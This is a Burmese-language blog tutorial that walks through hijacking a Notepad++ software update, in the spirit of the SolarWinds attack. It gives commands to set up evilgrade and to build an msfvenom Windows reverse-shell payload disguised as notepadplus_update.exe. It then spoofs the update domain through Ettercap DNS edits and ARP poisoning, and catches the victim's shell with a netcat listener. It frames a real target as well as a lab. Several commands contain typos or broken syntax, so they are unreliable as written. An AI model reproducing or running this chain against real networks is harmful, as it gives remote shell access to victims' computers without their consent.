OUO Banner

Latest Posts

Software Upgrades Hijacking like SolarWings Attack


SolarWings Attack အကြောင်း သိပြီးပြီဆိုတော့ MitM ကို လက်တွေ့ စမ်းကြည့်ချင်ကြမှာပါ။ SolarWings သာမက Stuxnet Worm သည်လည်းပဲ Realtek and Jmicro ရဲ့ Driver Signature တွေကို သုံးပြီးတော့ Update ကို Kernel ထဲအထိ install လုပ်ခဲ့တာ ဖြစ်ပါတယ်။ Legiimate signature တွေ ဖြစ်တာမို့လို့ System က ဘာမှ မမေးတော့ဘဲ Upgrade လုပ်လို့ရသွားတာပါ။ ဒါက ဘာကိုပြသလဲဆိုရင် အကောင်းဆုံးဆိုတဲ့ အခြေအနေနဲ့ digital signature တွေရဲ့ အားနည်းချက်ကို မြင်သာစေခဲ့တဲ့ ဖြစ်ရပ်တွေ ဆိုတာကိုပါ။ လက်တွေ့လေး စမ်းကြည့်ကြစို့။

Step #1: evilgrade

isr-evilgrade က အစောပိုင်း Kali ဗားရှင်းတွေမှာ built-in ပါဝင်ခဲ့ပြီးတော့ နောက်ပိုင်းမှာတော့ ပါမလာပြန်ပါဘူး။ ပါသည်ဖြစ်စေ မပါသည်ဖြစ်စေ apt install ကို သုံးပြီးတော့ install လို့ရပါတယ်။

kali #  evilgrade

ပုံမှာ မြင်ရတဲ့အတိုင်း evilgrade က သူ့မှာပါတဲ့ module တွေကို loading လုပ်တာကို မြင်ရမှာပါ။ module တစ်ခုစီက evilgrade အနေနဲ့ hijact လုပ်နိုင်တဲ့ software App တွေကို ကိုယ်စားပြုပါတယ်။

kali #  show modules

ဒီနေရာမှာ နမူနာအနေနဲ့ Notepad++ ကို hijack လုပ်ပြပါမယ်။ configure လုပ်ဖို့အတွက် အောက်ပါအတိုင်း ရိုက်ပါ

evilgrade > configure notepadplus

module ကို ဖတ်ပြီးတဲ့အခါ အထဲမှာ ဘာ option တွေပါလဲဆိုတာ ဒီလို ကြည့်နိုင်ပါတယ်။

Step #2: Generate Payload in Metasploit

ပြီးရင်တော့ နောက်ထပ် Terminal တစ်ခုကနေ msfvenom ကို သုံးပြီးတော့ Payload တစ်ခု ထုတ်ထားပါမယ်။ အကယ်၍ Metasploit နဲ့ ပတ်သက်ပြီးတော့ အစိမ်းသက်သက် ဖြစ်နေတယ်ဆိုရင်တော့ ဒီနေရာကိုနှိပ်ပြီး စာလေးနည်းနည်း ဖတ်ကြည့်ပါ

ခု notepadplus_update.exe ဆိုတဲ့ ဖိုင်တစ်ခု ဖန်တီးပါမယ်။ သူ့ကို /root/evilgrade ဆိုတဲ့ directory တစ်ခုမှာ ဖန်တီးပြီး သီးသန့်ထားထားပါမယ်။

kali  #  sudo   mkdir   /root/evilgrade

directory တစ်ခု ဖန်တီးပြီးတဲ့အခါ payload တစ်ခု create လုပ်မှာ ဖြစ်ပါတယ်။

kali # msfvenom windows/shell_reverse_tcp LHOST 192.168.1.118 LPORT=6996 X > /root/evigrade/notepadplus_update.exe

IP နေရာမှာတော့ မိမိတို့ IP ဖြည့်ရမှာပါ။ ခုဆိုရင်တော့ Notepadplus_update ဆိုတဲ့ exe ဖိုင်တစ်ခု ရပြီ ဖြစ်ပါတယ်။ msfvenom အကြောင်းကို အလျဥ်းသင့်တဲ့အခါ ရေးပြပါဦးမယ်။

Payload ဖန်တီးပြီးပြီ ဆိုတော့ evilgrade ကို ဖန်တီးထားတဲ့ exe နဲ့ သိအောင် set လုပ်ပေးရမှာ ဖြစ်ပါတယ်။ တစ်ခု သတိပြုရမှာက Linux system သည် တိကျပါတယ်။ Case Sensitive ဖြစ်တာမို့ ဖိုင်လမ်းကြောင်း နဲ့ ဖိုင်နာမည် အကြီးအသေးကအစ လွဲလို့လုံးဝ မရပါ ဘူး။

evilgrade (notepadplus) > set agent /root/evilgrade/notepadplus_update.exe

>

ပြီးပြီဆိုရင်တော့ server ကို start လုပ်နိုင်ပါပြီ။

evilgrade (notepadplus) > start

Step #3: Download and Install Notepad+

ဒါကတော့ ကိုယ့်ရဲ့ Lab machine ထဲမှာ Notepad++ ကို install ဖို့ပါ။ Real World မှာတော့ ကိုယ့်ရဲ့ Target သည် Notepad++ ကို သုံးနေတဲ့သူလို့ ယူဆရအောင်။ မရှိသေးရင် ဒီမှာ ဒေါင်းပါ.

ခုဆိုရင်တော့ Lab Machine မှာလည်း Notepad++ ရှိနေပြီဖြစ်ပါတယ်။

Step #4: Setting Up our MiTM

MiTM attackကို စတင်ပါမယ်။ Ettercap ကို ပူးတွဲသုံးပါမယ်။ Ettercap အကြောင်း နောက်ပိုင်းမှာ ရေးဖြစ်မယ်ထင်ပါတယ်။ ခုတော့ အခြေအနေအရ မရေးနိုင်သေးပါဘူး။ 😊😊

Ettercap ကို သုံးပြီးတော့ DNS queries ကို redirect လုပ်ပါမယ်။ ပထမဆုံး ettercap ကို ဖွင့် dns file ကို edit လုပ်ရပါမယ်။ မိမိအဆင်ပြေရာ Text editor ကို သုံးနိုင်ပါတယ်။ အောက်ပါ နမူနာထဲက တစ်ခုခုကို သုံးနိုင်ပါတယ်။

kali # sudo leafpad /etc/ettercap/etter.dns

kali # sudo mousepad /etc/ettercap/etter.dns

kali # sudo nano /etc/ettercap/etter.dns

ဖိုင်ထဲကို နောက်ထပ် စာတစ်ကြောင်း ထပ်ထည့်ပါမယ်။ ထည့်တဲ့ကောင်က VirtualHost address အဖြစ် သုံးမှာဖြစ်ပါတယ်။ အောက်ပါအတိုင်း ဖြည့်ပါ။

notepad-plus.sourceforge.net A 192.168.1.106

ပြီးရင်တော့ Ettercap ကို Graphical Mode (GUI) နဲ့ စတင်နိုင်ပါပြီ။

kali # ettercapv -G

ပြီးရင် Sniff လုပ်နိုင်ပါပြီ။

နောက်တစ်ဆင့်က Ettercap ရဲ့ dns_spoof plugin ကို activate လုပ်ပေးဖို့ဖြစ်ပါတယ်။ Plugins -->Manage Plugins -->dns_spoof

ပြီးတော့Hosts --> scan for hosts.

host scanning ပြီးသွားရင် ဒါဆက်လုပ် -- Hosts --> Hosts listအောက်ပါပုံစံမျိုး ဖြစ်လာမယ်။ IP အနည်း အများကတော့ သင့် network အနေအထားပေါ် မူတည်ပါတယ်။

IP တွေထဲကမှာ Router ကို Target 1 ထားမယ်။ Victim ကို Target 2 ထားပါမယ်။ ပြီးရင်

ARP poisoning ကို စတင်လုပ်ဆောင်နိုင်ပါပြီ။ Mitm --> Arp poisoning

Sniff Remote connections ကို အမှန်ခြစ် ဖြည့်ပါမယ်

Step #5: Set Up a Netcat Listener

Victim က update လုပ်တဲ့အခါမှာ ပြန်ရလာမယ့် shell access အတွက် netcat (nc) နဲ့ listen လုပ်ထားဖို့ လိုပါမယ်။ Terminal အသစ်တစ်ခုကနေ လုပ်ထားနိုင်ပါတယ်။ ခု ဆိုရင်တော့ Router နဲ့ Victim ရဲ့ ကြားမှာ ကြားလူ အဖြစ် ရောက်နေပါပြီ။ ဒီတော့ သူတို့တွေရဲ့ ဆက်သွယ်မှုမှန်သမျှက ကျွန်တော်တို့ရဲ့ system ကို ဖြတ်သွားရမှာ ဖြစ်ပါတယ်။ Payload create လုပ်ခဲ့စဥ်က သုံးတဲ့ခဲ့ port 6996 ကို သုံးပြီးတော့ listen လုပ်မှာပါ။

kali # nc -l -p 6996

kali # nc -lvp 6996

victim က Notepad++ ကို ဖွင့်လိုက်တဲ့အခါ Update လုပ်ဖို့ပြောနေတာကို မြင်ရမှာ ဖြစ်ပါတယ်။

"Yes" ကို နှိပ်လိုက်မယ်ဆိုရင်တော့ ကျွန်တော်တို့ရဲ့ malicious server ကနေ Payload ကို ယူသွားမှာ ဖြစ်ပါတယ်။ တကယ် update မလုပ်ဘဲနဲ့ victim's system ရဲ့ shell access ကို ရမှာ ပါ။

MiTM တွေထဲက တစ်ခုပါ။ နောက်ထပ်လည်း အလျဥ်းသင့်တဲ့အခါ ထပ်ရေးသွားပါဦးမယ်။



အားလုံးကို ကျေးဇူးပါ

No comments